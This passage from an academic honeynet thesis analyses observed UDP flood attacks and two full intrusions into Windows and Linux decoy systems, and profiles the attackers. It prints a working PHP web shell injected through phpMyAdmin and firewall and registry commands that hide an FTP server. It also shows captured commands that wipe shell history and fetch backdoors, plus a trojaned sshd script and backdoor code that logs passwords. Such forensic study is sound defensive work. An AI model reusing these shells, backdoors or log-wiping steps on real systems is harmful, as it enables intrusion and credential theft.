In our case, we observed four UDP-based DDoS attacks on one decoy. On the respective days, UDP traffic increased dramatically, as can be seen in Figure 5.16. The timeline for one attack is shown in Figure 5.17. In the first 17 hours prior to the incident, we measured an overall sum of only 85 packets. At the beginning of the attack at 5:03 p.m., this figure suddenly jumped to more than 400,000 packets. For two hours, we monitored between 100,000 and 800,000 packets per minute going to our honeypot. At the end of the DDoS attempt, UDP packet rates quickly decreased, and only 36 further packets were captured in the remaining hours of the day. In total, almost 82 million packets were sent to our machine during the four attacks. 22 systems from 8 countries were involved in the incidents. A summary of the results is shown in Table 5.6.

Figure 5.15: Schematic Overview of a Distributed Denial of Service Attack (Source: Based on Criscuolo, 2000)

The majority of packets solely contained the single-byte character 0x30 and targeted arbitrary ports of our system (see Figure 5.18). Accessing random ports on the machine of the victim is an efficient flooding technique (cmp. Criscuolo, 2000): In many cases, the port in question is likely to be closed. Consequently, in compliance with Postel (1981a), the operating system generates an ICMP Destination Unreachable notification message that is returned to the sender. In sum, these messages act as further amplifiers for the attack and possibly affect other machines on the network as well. Criscuolo (2000, p. 14) concludes: “If enough UDP packets are sent to dead ports on the target host, not only will the target host go down, but computers on the same segment will also be disabled because of the amount of traffic”. Luckily, all outbound messages were successfully blocked by the Honeywall to mitigate risks as best as possible.
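A packet storm of this kind stands out clearly once packets are counted per time interval. The sketch below is a simplified illustration rather than the analysis tooling used for this thesis: it assumes that packet timestamps (in seconds) have already been exported from the capture, the function names are hypothetical, and the default threshold of 100,000 packets per minute is merely borrowed from the lowest per-minute rate reported above.

```python
from collections import Counter

def packets_per_minute(timestamps):
    """Bucket packet timestamps (seconds since some epoch) by minute."""
    return Counter(int(ts // 60) for ts in timestamps)

def flood_intervals(timestamps, threshold=100_000):
    """Return (first_minute, last_minute) spans whose rate meets the threshold.

    The default threshold is an assumption taken from the lowest
    per-minute rate mentioned in the text; tune it for other setups.
    """
    counts = packets_per_minute(timestamps)
    hot = sorted(m for m, n in counts.items() if n >= threshold)
    spans = []
    for minute in hot:
        if spans and minute == spans[-1][1] + 1:
            spans[-1] = (spans[-1][0], minute)  # extend the current span
        else:
            spans.append((minute, minute))      # start a new span
    return spans

# Synthetic example with a tiny threshold: quiet traffic, a burst during
# minutes 2 and 3 (120 packets each), then quiet traffic again.
quiet = [10.0, 75.0, 250.0]
burst = [120.0 + 0.5 * i for i in range(240)]
print(flood_intervals(quiet + burst, threshold=100))
```

Because the default Snort rule set did not flag the attacks at all, a rate-based check of this kind is one plausible way to surface them. A fixed threshold is a design simplification; comparing each minute against a moving baseline would adapt better to links with varying background traffic.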
Figure 5.16: Number of UDP Packets Captured per Day in the Honeynet

Country        | Number of Systems Involved | Number of Packets Sent
United States  | 6                          | 37,932,042
Thailand       | 5                          | 21,217,361
Mexico         | 3                          | 14,024,735
India          | 3                          | 4,527,677
South Korea    | 2                          | 3,828,526
France         | 1                          | 160,622
United Kingdom | 1                          | 110,566
Japan          | 1                          | 83,755

Table 5.6: Countries Involved in Different Distributed Denial of Service Attacks

In about 16% of the captured data samples, we extracted larger payloads of up to 50 bytes that were destined for the two UDP ports 22 and 80. We were unable to determine why specifically these ports were flooded, though. Mirkovic and Reiher (2004) and Chang (2002) have identified several motives for DDoS attempts, e.g., inflicting damage on business competitors for monetary reasons. However, these motives hardly apply to our honeynet architecture. Therefore, why our decoy was attacked remains a matter of speculation in the end.

Figure 5.17: Timeline of a UDP Packet Storm on a Honeypot

Figure 5.18: Analysis of a UDP Packet Storm

5.3 Selected Attacks on the Honeynet

In the following, we present two attacks on our honeypots in detail. We illustrate the tools and tactics that were of great help during the intrusion and try to explain why the systems were targeted and what they were used for once they had been penetrated.

5.3.1 Attack on the Microsoft Windows Honeypot

Our Microsoft Windows-based honeypot was successfully compromised less than 24 hours after we had connected the decoy to the Internet. A summary of the attack sequence is presented below, followed by an evaluation of the incident. A basic personal profile as well as a taxonomy of the intruder are the subject of Sections 5.3.1.3 and 5.3.1.4.
5.3.1.1 Sequence of the Attack

On February 28 at 7:44:59 p.m., the phpMyAdmin database administration program is opened over the HTTP protocol by an adversary with the IP address 87.230.xxx.xxx. Due to improper configuration settings, the application is fully accessible over the Internet as we have stated in Section 5.1.1. Consequently, the individual components are prone to manipulation, including the mysql main database that stores sensitive information such as usernames and passwords. However, the blackhat does not take notice of the data but begins to import a prepared SQL (Structured Query Language) script that is printed in Listing 5.4. When it is executed, a basic file upload utility is created in the root directory of the server that also permits running arbitrary commands on the host. To perform said operations, a temporary database table needs to be generated (see Line 1). It is deleted with the help of the drop instruction at the end of the script to erase the traces of the intrusion. Although the techniques described above are quite simple, they clearly demonstrate how a misconfigured database management system may easily put the underlying platform at risk.

    create table dblog (text text);

    insert into dblog set text = '<?
    $sendfile = $_REQUEST["sendfile"];
    $cmd = $_REQUEST["-cmd"];

    if ($sendfile == "true") {
      $fn = $_FILES["file"]["name"];
      $tn = $_FILES["file"]["tmp_name"];

      if (move_uploaded_file($tn, dirname(__FILE__) . "/" . $fn))
        $result = "<br><font color=green>upload done</p>";
      else
        $result = "<br><font color=red>upload failed</p>";
    }
    ?>

    <html>
    <body>
    <form method=POST>
    <input type=TEXT name="-cmd" size=64 value="<?=$cmd?>">
    </form>
    <form enctype="multipart/form-data" method="post" action="">
    <input type=file name=file size=20>
    <input type="submit" value="Upload">
    <input type="hidden" name="sendfile" value="true">
    <?=$result?>
    </form>
    <pre>
    <? if ($cmd != "") echo shell_exec($cmd);?>
    </pre>
    </body>
    </html>';

    select * from dblog into outfile 'C:/xampp/phpMyAdmin/db_log.php';
    DROP TABLE `dblog`;
    FLUSH LOGS;

Listing 5.4: Manipulation of the System Database

At 7:47:31 p.m., the attacker starts downloading a number of tools after briefly checking the configuration of the network interface card. Using the rcp command, which is part of the operating system, a remote connection with the IP address 85.176.xxx.xxx is established, and a file mo.php is transferred to the target machine. This file is recognized as a variant of the c99 shell, a trojan backdoor that is written in the PHP programming language. As can be seen in Figure 5.19, the trojan comprises a powerful graphical interface that offers many features, including browsing through the entire directory hierarchy, editing or deleting contents, and executing commands.

Apart from the c99 shell, two additional files are copied to the honeypot, namely secure.old and secure.exe. The latter is identified as the Serv-U file transfer server by Rhino Software [25]. The program can be silently installed and invoked on the command line and therefore enjoys a questionable reputation in the underground community (see Rhino Software, 2004; Baldwin, 2002a). The other file, secure.old, contains initialization instructions as well as a list of pre-defined account names that may be used to log in to the server. After all operations are completed, the attacker quickly verifies that the two components have been successfully transferred to the decoy by running the dir command and listing the contents of the root directory.

With the help of the PHP shell, the Serv-U FTP server is installed as a system service in the next step (see Listing 5.5).
Furthermore, an exception is added to the local firewall rules to avoid traffic filtering and allow incoming requests. Finally, the service is started with the net start command and gets bound to six different network ports. Again, the intruder attempts to disguise her activities by choosing several well-known ports, e.g., port 53 that is registered for DNS (Domain Name System) lookups (see Internet Assigned Numbers Authority (IANA), 2008).

[25] see http://www.serv-u.com/

Figure 5.19: User Interface of the c99 shell Trojan Backdoor

    # the attacker installs the Serv-U FTP server as a system service
    secure.exe /i

    # an exception is added to the local firewall rules
    netsh firewall add allowedprogram C:\xampp\phpMyAdmin\secure.exe ftp ENABLE

    # the system service is finally started
    net start secure

Listing 5.5: Installation of the Serv-U FTP Server

At 7:51:45 p.m., a first FTP session is initiated, and a small binary bw1.exe is stored on the decoy. The program is capable of measuring the bandwidth of the Internet connection. For this purpose, a sample file must be repeatedly retrieved. In our case, Service Pack 3 for Microsoft Windows 2000 is downloaded 10 times. In total, more than 1.25 GB of data are sent to our machine during this process. At the end of the speed test, the attacker saves an audio file to the special directory System Volume Information on the primary partition of the hard disk. This directory usually contains information about system restore points and cannot be accessed at runtime by default (see Russinovich and Solomon, 2004). The restrictions only apply to the local computer, though, and can be circumvented through the external FTP communication. Under normal circumstances, the actions of the intruder would thus be hidden from the eyes of legitimate users.

In the following two hours, several further tools are stored on the honeypot to stay in control of the machine and conceal the incident. First, the adversary uploads a batch file ts.bat that modifies certain values in the system registry in order to enable the Microsoft Terminal Service. An extract of the file is shown in Listing 5.6. With the help of the service, it is possible to administer the operating system over the network.

    @echo off

    ...

    # store the new values in the helper file C:\hide.reg
    echo Windows Registry Editor Version 5.00 > c:\hide.reg
    echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> c:\hide.reg
    echo "AllowTSConnections"=dword:00000001 >> c:\hide.reg

    # import the values to the system registry
    REGEDIT /S c:\hide.REG

    # delete the helper file
    DEL /Q c:\hide.REG

    ...

Listing 5.6: Modification of the System Registry

At 8:10:25 p.m., the attacker copies a different variant of the c99 trojan backdoor to the root directory of the phpMyAdmin web application that serves as a replacement for the original PHP shell. The file is disguised as tbl_index.php. More interestingly, the source code of the trojan is obfuscated, i.e., it is made illegible by encoding all embedded strings, variables, and programming instructions. Thus, reverse engineering of the program is significantly more difficult, and antivirus scanners as well as malware removal utilities may possibly be bypassed.

The intruder also deletes several software modules of phpMyAdmin by running another batch file, 1.bat, which is transferred to the decoy (see Listing 5.7). On the one hand, these actions severely damage the application so that it cannot be executed any longer. On the other hand, the entry point to the system is closed, and related attacks are effectively prevented. As indicated in Listing 5.7, the result of each delete operation is appended to the temporary file Found.txt to make sure the machine has been successfully hardened. This file is downloaded at a later point in time.

    del \sql.php /S /Q /F >> Found.txt
    del \server_variables.php /S /Q /F >> Found.txt
    del \read_dump.php /S /Q /F >> Found.txt
    del \import.php /S /Q /F >> Found.txt
    del \server_privileges.php /S /Q /F >> Found.txt
    del \tbl_replace.php /S /Q /F >> Found.txt
    del \phpinfo.php /S /Q /F >> Found.txt
    del \main.php /S /Q /F >> Found.txt
    del 1.bat

Listing 5.7: System Hardening Operations on the Compromised Honeypot

At 8:12:23 p.m., the attacker starts covering her tracks and erases a number of programs that are not needed any more, including the original c99 shell. In the last step, various supplemental components for the Serv-U daemon are copied to a subfolder in the Windows system directory before the FTP session is terminated. The individual components are listed in Table 5.7 and are required to install another version of the Serv-U FTP server. The application is disguised as a DNS server and supports encrypted data transfers.

Run Level | MD5 Checksum | Description
a.bat | 4a8786fffb14bb8facf288f3cffcf42e | Batch script that is executed to install a disguised version of the Serv-U FTP server with support for encrypted data transfers.
Dnslib32api.cat | 1c0aacaf30b92277cfe55af07c200cfc | Auxiliary file for the disguised FTP server.
Dnstts.exe | cfe9801298579cd93e340d4cb84af8fd | Main executable of the disguised Serv-U daemon.
libeay32.dll, ssleay32.dll | cfe9801298579cd93e340d4cb84af8fd, d18bcf48a7624154745c0526cc8576f3 | Dynamic libraries that provide cryptographic functions in order to establish a secured connection.
ServUCert.crt, ServUCert.key | 7b8fa286633f087b2faf9a9584dcc72a, 2293486183632e8634aa30a1798bc5e7 | Security certificate and private key of the FTP server that are needed to initiate an encrypted session.

Table 5.7: Additional Components of the Serv-U FTP Server that are Required to Establish a Secured Connection

Three minutes later, at 8:15:24 p.m., such a secured channel is established with the server. Due to the use of strong encryption algorithms, examining the corresponding traffic flows would usually be infeasible at this point. In our case, though, we are in possession of the private key of the server, which is needed to decipher the network packets. Unfortunately, the key is protected with an unknown pass phrase and, thus, cannot be processed directly. To find the pass phrase, we run the strings utility, which is included in most Linux distributions, and extract all text patterns that are referenced by the server. After a short inspection of the results, we are lucky and succeed in generating a new, unencrypted private key by executing the free OpenSSL cryptography toolkit [26] as follows (cmp. OpenSSL Project, 2003):

    openssl rsa -passin pass:[pass phrase] -in ServUCert.key -out ServUCert-Unencrypted.key

In the next step, the new key can be imported to the Wireshark network analyzer as explained by Garland (2008). The captured data are then automatically decrypted as indicated in the lower right corner of Figure 5.20. As a consequence, we are able to recover the activities of the intruder and proceed with our investigation.
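The candidate search with the strings utility can be approximated in Python. The sketch below is an illustration under stated assumptions: it only mimics the basic behaviour of strings (runs of printable ASCII characters of a minimum length) and does not attempt to test any candidate against the protected key. The function name printable_strings and the sample bytes are hypothetical.

```python
import re

def printable_strings(data: bytes, min_length: int = 4):
    """Return runs of printable ASCII characters, similar to `strings`.

    Only bytes 0x20-0x7e are treated as printable here; the real utility
    offers further encodings and options that are not reproduced.
    """
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_length)
    return [match.decode("ascii") for match in pattern.findall(data)]

# Hypothetical binary blob; a real analysis would read the server
# executable from disk instead, e.g. with open(path, "rb").read().
blob = b"\x00\x01ServUCert.key\x00\xff\x10ab\x00candidate-phrase\x00"
for text in printable_strings(blob):
    print(text)
```

Each extracted string is only a candidate. Whether one of them actually unlocks the key still has to be verified separately, for example with the openssl rsa invocation shown above.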
Analyzing the secured session: Feeling protected by the encrypted communication channel, the adversary starts uploading a number of further utilities at 8:15:54 p.m.: The script install.cmd sets up a new system service lsasvc.exe which is identified as the Hacker Defender rootkit, version 1.0. The rootkit is capable of hiding specific files, processes, system registry keys, and network ports that are defined in a corresponding initialization file. In our case, all traces of the attack tools are removed. For instance, the newly installed FTP and DNS servers are excluded from the process list (see Figure 5.21). What is quite peculiar is the fact that various legitimate system components such as 26 see http://www.openssl.org/ 115 5 Implementation, Deployment, and Analysis of a Honeynet Figure 5.20: Analyzing Encrypted Network Traffic with Wireshark the service management screen or the Windows firewall are disabled during this process, too. Thereby, the attacker makes sure the original state of the compromised machine cannot be easily restored on the one hand. On the other hand, these types of system manipulations are extremely conspicuous and are likely to be detected by any system administrator. In addition to the rootkit, the intruder saves three dynamic libraries to a subfolder in the installation directory of the operating system. These libraries provide auxiliary functions for the Serv-U FTP server, e.g., to retrieve summary reports about the number of users that are currently logged in or to calculate the total amount of data that were transferred in the course of a FTP session. Furthermore, they enable to display personal messages or logos when a connection has been successfully established. Although this rather seems as a minor feature, custom login banners are frequently used by blackhats to “advertise” their name, greet competing groups, and gain social status in the underground community (cmp. 
Honeynet Project, 2004b; Craig and Burnett, 2005; Rogers, 2000b). An example of such a banner that we captured on our honeypot is presented in Figure 5.22.

Figure 5.21: Subversion of a System With the Hacker Defender Rootkit. (a) Running processes on the system before the rootkit is executed. (b) After the rootkit has been installed, specific processes are removed from the process list.

After all operations are completed, the adversary invokes an internal site maintenance interface multiple times to check the functionality of the server. With the help of this interface, it is possible to adapt core configuration settings of the service over a remote connection such as changing the network ports the application is bound to. In the last step, the adversary logs in as the alternative user fill0r, uploads an audio file as well as the first part of a pirated DVD to a subdirectory of the xampp distribution, and rechecks the status of the FTP server. The connection is finally closed at 9:54:27 p.m. At this point, we decide to shut down our honeypot and start analyzing the compromise. The individual tools that were used for the penetration are summarized in chronological order in Table 5.8; a timeline for the entire attack sequence is illustrated in Figure 5.23.

Figure 5.22: Custom Login Banner of the Attacker

Table 5.8: Attack Tools Used During the Compromise of the Windows Honeypot

Attack Tool: db_log.php
MD5 Checksum: 72527be487571260838fa8ada207ca46
Description: Basic file upload and command execution utility that is used by the intruder to retrieve additional attack tools.

Attack Tool: mo.php
MD5 Checksum: 34e47e3d7711889e4abe5d64d153eda2
Description: PHP-based trojan backdoor c99 shell that comprises a significant amount of file as well as system manipulation functions. The shell is run to install a number of system services, including the FTP server described below.

Attack Tool: secure.exe, secure.old
MD5 Checksum: e7c177b23210819b4a9087343351e045, b7b4cce7b902a9c735c27c9b22054c56
Description: Server component and initialization file of the Serv-U FTP Server. With the help of the server, further utilities are transferred to the honeypot.

Attack Tool: bw1.exe
MD5 Checksum: 31924ef0ae98f9cf7884d41d91499751
Description: Speed test utility that measures the bandwidth of the Internet connection. Thereby, the adversary is able to assess the value of the compromised machine.

Attack Tool: ts.bat
MD5 Checksum: 64f1bb47710b59ccc03efa1c09d355c3
Description: Batch script that enables the Microsoft Terminal Service in order to provide the intruder with a graphical remote user interface.

Attack Tool: tbl_index.php
MD5 Checksum: 4959954f89270ef01979029d180ee3c5
Description: Obfuscated version of the c99 shell which is set up to maintain access to the system.

Attack Tool: 1.bat
MD5 Checksum: 6a48b5bfa1a60f4620077acd253ba245
Description: Batch script that deletes various core components of the phpMyAdmin database management system to harden the machine against further attacks.

Attack Tool: install.cmd, lsasvc.exe, lsasvc.ini
MD5 Checksum: 906590f18a9065b055d52f779e1dc220, 29d6dfbb62cb51674f4b6d00976e5288, 68b19fe27a6aea5519f2519a6ee3658a
Description: Setup and program files of the Hacker Defender rootkit. The rootkit subverts the operating system and helps conceal the incident.

Attack Tool: on.dll, off.dll, dir.dll
MD5 Checksum: 4b61fae8269e6875189b681446a645c0, 7f538611e5ee85211a1a979d2dd94a5b, 2012dd7c39441d80a684ed4d45f07c0f
Description: Supplemental files for the Serv-U FTP server that provide auxiliary functions, e.g., displaying custom banners or status information about the service.

Figure 5.23: Timeline of the Attack on the Windows Honeypot

5.3.1.2 Evaluation of the Attack

Due to a poorly configured instance of the phpMyAdmin database administration program, the attacker is able to easily gain administrative privileges and upload her own tools.
These tools include a trojan backdoor that permits manipulating the entire machine over the Internet as well as a rootkit that is capable of subverting the operating system in order to conceal the incident. In the next step, the intruder sets up a file transfer server and begins to store several audio and video files. We assume these files are to be made available to software pirates. This assumption is based on the following findings: First, the FTP server is configured to grant access to numerous users, e.g., to the user fill0r, but also to various so-called leeches. A fill0r [27] is responsible for “filling” an exploited host with applications, movies, or other types of media, while leeches typically only consume the stored material and do not share their own contents (see “B-Bstf” Smith, 2004). Second, the server keeps track of the data that is transferred to and from the decoy and displays detailed usage statistics. Third and last, users are explicitly invited to “squeeze out every bit” of the machine [28].

Taking the different aspects into consideration, we expect that our honeypot is to be turned into a so-called public stro (or pubstro in short), i.e., a compromised high-capacity public server that is misused to distribute illegal copies of copyright-protected goods (see “BBstf” Smith, 2004, p. 29). In many cases, such a pubstro is integrated into a larger network of similarly penetrated systems and is run by participants of a special Internet subgroup which is known as the warez scene (see Sen and Krömer, 2008; Craig and Burnett, 2005). For this reason, it is beneficial to analyze the incident not only with regard to the intruder, but also with respect to said subgroup. Thereby, we can possibly assess the intentions and motives of the adversary more accurately and create a more detailed profile of her personality.
[27] Note: This is a jargon word for “filler”. Substituting numbers for letters is common in certain subgroups of the Internet community and known as leetspeak. For more information, please refer to Raymond (2003).

[28] Note: This is a figurative translation of the greeting message of the captured login banner.

5.3.1.3 Profile of the Attacker

Based on the pieces of evidence we collected on the compromised decoy, we are able to draw conclusions about the presumable origin and technical expertise of the attacker. Especially an evaluation of the latter characteristics can greatly facilitate a broad classification of the intruder (cmp. Rogers, 2000a; Hollinger, 1988). For a more reasonable taxonomy, however, we need to take motivation-related factors into account as well (cmp. Chantler, 1995; Rogers, 2005). These factors can be grouped into six categories that are outlined in the second half of this section.

Presumable origin of the attacker: Surprisingly, only two systems are used by the blackhat during the intrusion to gain access to our honeypot. The respective hosts with the IP addresses 87.230.xxx.xxx and 85.176.xxx.xxx are traced to two different German Internet service providers (ISPs). A number of further indications also suggest that the intruder is likely to originate from Germany. For instance, both the greeting message that is displayed when logging in to the Serv-U FTP server and several passwords that we intercepted at the beginning of an FTP session are composed in German. The user-agent strings that are transmitted by the attacking machine to our decoy each time a web site is retrieved contain the German country code as shown in the extract of a captured network packet below.
    Mozilla/5.0 (Windows; U; Windows NT 5.1; de; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12

As can be seen, we are also able to identify the system platform of the adversary by analyzing the different sections of the string (see also Mozilla Developer Center, 2009; Microsoft Corporation, 2009, for an overview of the sections of the user-agent string). In our case, the intruder uses a Microsoft Windows operating system and a recent version of the Mozilla Firefox Internet browser. It is important to note though that these pieces of information are entirely under the control of the client and, thus, may have been tampered with (see Andrews and Whittaker, 2006). Additionally, the individual IP addresses that are recorded during the incident do not necessarily reflect the real origins of the attack either. As many authors point out, attackers frequently abuse intermediary machines, so-called proxies, to cover their tracks and circumvent prosecution (cmp. Honeynet Project, 2004b). Therefore, each source of data must generally be regarded with great care. By combining and linking the captured elements, however, we are able to draw a more complete picture and find a solid foundation for our hypothesis.

Presumable expertise of the attacker: Within a period of slightly more than 15 minutes, the blackhat exploits a vulnerability in one of our applications, penetrates the machine, and sets up her own FTP server. Taking these step-by-step actions into account, we conclude the intrusion has been well planned and prepared for. Furthermore, given that the adversary is familiar with a number of attack tools and is quickly able to upload a customized login banner, we have reason to believe she has already gained a certain experience with similar system compromises. On the other hand, she does not seem to fully understand the complexity of specific utilities, most importantly, the rootkit that is installed on our decoy but is quite poorly configured (cmp. Section 5.3.1.1).
Some operations are also carried out repeatedly, e.g., the Serv-U daemon is added multiple times to the exception list of the local firewall rules. It also remains unclear why two variants of the same trojan backdoor are transferred to our honeypot. In summary, even though the strategy and methods of the intruder are fairly efficient, we assume her technical expertise and skills are rather low.

Presumable motivations of the attacker: As members of the Honeynet Project (2004b) note, identifying the motivations of attackers is key to gaining a deep understanding of their behavior. In turn, by observing the activities of intruders, we are able to draw conclusions about their intentions and reveal inherent factors such as motives and attitudes (see Fishbein and Ajzen, 1975; Ajzen, 1991, for an overview of the interrelation between motivations, attitudes, and behavior). With respect to computer crime, the social psychologist Max Kilger differentiates the following six prevalent motivations that are subsumed under the acronym MEECES (see Honeynet Project, 2004b, p. 509-520): money, entertainment, ego, cause (i.e., ideology), entrance to social group, and status. After examining the sequence of the attack, we did not find any evidence the incident was monetary- or ideology-driven. Furthermore, considering the adversary attempted to “keep a low profile” and made significant efforts to stay in control of the machine, we feel the compromise was not carried out purely for entertainment purposes. On the other hand, the fact that a personal logo was uploaded to our honeypot and the system was being made available to multiple users indicates a certain desire for appreciation and the need to rise in esteem as well as status. This observation is supported by Rogers (2000b, p.
19): “The reinforcement derived from hacking may come from the increase in knowledge, prestige within the hacking community, or the successful completion of the puzzle (...)”. Consistently, Jordan and Taylor (1998, p. 768) argue that “peer recognition from other hackers or friends is a reward and goal for many hackers, signifying acceptance into the community and offering places in a hierarchy of more advanced hackers”. To sum up, ego-, social-, and status-related elements apparently were the dominant motivational drivers for the blackhat to penetrate our decoy, rather than monetary or ideological factors.

5.3.1.4 Taxonomy and Classification of the Attacker

A number of authors emphasize that “hackers” do not form a homogeneous group, e.g., because of different social, personal, or technical backgrounds (cmp. Rogers, 2000b; Chantler, 1995). Therefore, various attempts have been made in the literature to divide computer criminals into meaningful categories (cmp. Hollinger, 1988; Cross and Shinder, 2008). This categorization is a “necessary first step toward understanding these individuals” (see Rogers, 2001, p. 48). To a great extent, however, the results of this research are quite dated at the time of this writing, mainly qualitative in nature, and cannot be regarded as entirely representative (cmp. Rogers, 2001, p. 47-61). As Rogers (2005, p. 2) concludes, “even with the current increase in computer crime rates, there has been a lack of empirical studies based on a solid scientific method in this area”. For this reason, he proposes a new, two-dimensional framework and distinguishes 8 types of attackers depending on their skills and motivation. In compliance with this model, the intruder we monitored can be classified as a novice or cyber-punk. These individuals are described as technically less competent and strongly rely on pre-compiled toolkits in order to successfully penetrate a system.
Their motivation primarily results from the rise in ego they feel when a machine is compromised as well as the wish to be accepted as a legitimate part of the hacker subculture. Similar observations are also reported by participants of the Hacker’s Profiling Project (HPP) [29], an international research group that strives to create empirically-valid profiles for computer crimes (see also Chiesa et al., 2009). According to their experiences, these types of blackhats are typically organized within some kind of group and scan the Internet for specific vulnerabilities. Once a vulnerability is found, the respective computer is exploited with the help of tools and simple scripts and is used for the purposes of the adversary.

5.3.2 Attack on the Linux Honeypot

Our Fedora-based Linux honeypot was compromised after having been online for about six weeks. The sequence of the intrusion is illustrated in the following section. Similar to the attack presented in the previous section, we conclude with a short evaluation of the incidents and briefly outline the alleged motives and characteristics of the intruder.

5.3.2.1 Sequence of the Attack

In the early morning of April 16, at 03:42:42 a.m., the monitoring devices of our Honeywall detect the beginning of an automated password brute force attack. The probes originate from a machine with the IP address 192.104.xxx.xxx and target the secure shell server of our Fedora-based Linux honeypot. Within a period of less than 25 minutes, the weakly-protected root superuser account is compromised, and valid authentication credentials are found. More than two hours later, at 6:15:46 a.m., an adversary initiates an encrypted connection from the IP address 85.18.xxx.xxx and logs in for the first time. Although the network channel is secured, we are able to accurately reconstruct the activities of the intruder with the help of Sebek that is running on our decoy.
An extract of the captured keystrokes is shown in Listing 5.8. The individual steps of the attacker are described in more detail below. First, the blackhat disables the history functionality of the shell. The shell history is a standard feature of the bash command interpreter and keeps track of all instructions that are typed in over the system console for the convenience of the user (cmp. GNU Free Software Foundation, 2009). Its behavior is controlled by several environment variables. For instance, the variable HISTFILE defines the name of the file the history is written to. If this variable is “unset” (cmp. Line 1 of Listing 5.8), the logging mechanism of the shell is turned off, and commands are not persistently saved any longer (cmp. Ithilgore, 2008). To make sure the operation is carried out successfully, the attacker is careful to delete potential aliases of the variable such as HISTSAVE or HISTLOG as well.

[29] see http://hpp.recursiva.org/en/index.php

     1  [06:16:10] unset HISTFILE HISTSAVE HISTMOVE HISTZONE HISTORY HISTLOG
     2      USERHST REMOTEHOST REMOTEUSER ;
     3      wget <...>/m.tar.gz ; tar -xzvf m.tar.gz ;
     4  [06:16:12] rm -rf m.tar.gz ; chmod +x m ; ./m -u root -n 1;
     5      rm -rf m
     6  [06:16:14] w
     7  [06:16:51] wget <...>/backdoor ; tar zxvf backdoor ;
     8      rm -rf backdoor ; cd .ssh ;
     9  [06:18:12] ./install
    10  [06:24:59] w
    11  [06:25:25] wget <...>/scan/scanner2 ; tar zxvf scanner2 ;
    12      rm -rf scanner2 ; cd scan ;./go.sh 71
    13  [06:25:31] cd ..
    14  [06:25:37] rm -rf .ssh
    15  [06:25:49] w
    16  [06:26:05] rm -rf scan
    17  [06:26:44] w
    18  [06:26:46] uname -a
    19  [06:26:54] /sbin/ifconfig

Listing 5.8: Extract of Keystrokes Captured by Sebek

In the next step, the adversary starts downloading a compressed archive from a public Internet domain [30]. This archive contains a single binary m which is identified as the MIG Logcleaner [31], version 2.0.
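Timestamped keystroke records such as those in Listing 5.8 lend themselves to simple automated processing, for example to locate pauses in which the intruder waits for a download or a compilation to finish. The sketch below assumes the "[HH:MM:SS] command" layout used in the listing; native Sebek output may be structured differently, and the function names are illustrative.

```python
import re

# Layout assumed from Listing 5.8: "[HH:MM:SS] command".
ENTRY = re.compile(r"^\[(\d{2}):(\d{2}):(\d{2})\]\s+(.*)$")


def parse_keystrokes(lines):
    """Turn '[HH:MM:SS] command' lines into (seconds_since_midnight, command) tuples."""
    entries = []
    for line in lines:
        match = ENTRY.match(line.strip())
        if match is None:
            continue  # skip lines that do not start with a timestamp
        hours, minutes, seconds, command = match.groups()
        entries.append((int(hours) * 3600 + int(minutes) * 60 + int(seconds), command))
    return entries


def pauses(entries, threshold=60):
    """Return (gap_in_seconds, next_command) for gaps longer than threshold seconds."""
    result = []
    for (prev_time, _), (next_time, command) in zip(entries, entries[1:]):
        gap = next_time - prev_time
        if gap > threshold:
            result.append((gap, command))
    return result


# Four consecutive records copied from Listing 5.8.
log = [
    "[06:16:14] w",
    "[06:16:51] wget <...>/backdoor ; tar zxvf backdoor ; rm -rf backdoor ; cd .ssh ;",
    "[06:18:12] ./install",
    "[06:24:59] w",
]
print(pauses(parse_keystrokes(log)))  # [(81, './install'), (407, 'w')]
```

For these records, the longest pause (407 seconds) follows the ./install command, which is consistent with the trojaned service being compiled and set up during that time.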
As the name suggests, the program is capable of erasing specific entries in the main Linux log files /var/log/utmp, /var/log/wtmp, and /var/log/lastlog. At 06:16:11 a.m., the application is invoked with the parameters -u root and -n 1 (cmp. Line 4 of Listing 5.8) to remove all traces of the unauthorized superuser access.

[30] Note: The Internet address of the domain has been sanitized to protect the privacy of the involved parties.

[31] see http://pc-freak.eu/sploits/info/download.txt

In addition to the log cleaner, the intruder also retrieves two archives from a private website with the IP address 209.63.xxx.xxx (see Line 7 and Line 11). The first archive contains a manipulated version of a secure shell server and is extracted to the hidden directory .ssh. At 06:18:12 a.m., the server is compiled and set up with a custom installation script that is displayed in Listing 5.9. Thereby, our own service on the machine is replaced. What is more interesting, the syslog daemon of the operating system is temporarily shut down during this process to prevent suspicious records of these activities in the log files.

    #!/bin/sh

    # edit the configuration file of the trojaned service
    pico dm.h

    # configure, compile, and install the trojaned service
    ...

    # overwrite the original daemon
    cp -f ./sshd /usr/sbin/sshd
    cp -f ./sshd /usr/local/sbin/sshd

    # stop the original instance of the service and start the trojan
    kill -9 `cat /var/run/sshd.pid`
    /sbin/service syslog stop
    /usr/sbin/sshd
    /sbin/service syslog start

Listing 5.9: Setup Script of a Trojaned Secure Shell Server

The file dm.h that is referenced in the installation script is not part of the original SSH software. After a short examination of the respective source code, we discover a secret trojan backdoor. The algorithm for this backdoor is outlined in Listing 5.10. As can be seen on Line 6, the verification routine of the service is completely circumvented in case a magic password is entered. Consequently, access to the system may be maintained even if the intrusion is detected and the superuser password is changed at a later point of time. On the other hand, if a legitimate user tries to log in, her credentials are transparently written to a special log file that is controlled by the attacker, before the original password checking function is called (see Lines 13 to 15 and Line 18). These pieces of information can possibly be used to attack further machines on the network.

     1  int sys_auth_passwd(Authctxt *authctxt, const char *password)
     2  {
     3      ...
     4
     5      // grant access at all times if the magic password is entered
     6      if ((strcmp(password, MAGIC_PASS)) == 0) {
     7          dm = 1;
     8          return 1;
     9      } else {
    10          dm = 0;
    11
    12          // log authentication credentials
    13          fd = fopen(LOGFILE, "a");
    14          fprintf(fd, "%s:%s\n", authctxt->user, password);
    15          fclose(fd);
    16
    17          // check whether the user has entered a correct password
    18          return (strcmp(encrypted_password, pw_password) == 0);
    19      }
    20  }

Listing 5.10: Backdoor Mechanism Implemented in the Secure Shell Server

The second archive that is downloaded from the private website contains a network scanner and a simple password brute force utility. These tools are coordinated by a small auxiliary script. It is executed at 06:25:25 a.m.
in order to probe an entire class A network for vulnerable systems (cmp. Line 12 of Listing 5.8). However, these outbound connections are blocked by our Honeywall to mitigate risks as best as possible. Before logging out, the adversary covers her tracks and deletes all files that have been transferred to the honeypot during the intrusion. Furthermore, she briefly runs the uname command to obtain basic information about the operating system and checks the configuration of the network interface cards. At 06:27:08 a.m., the connection is closed.

April 17

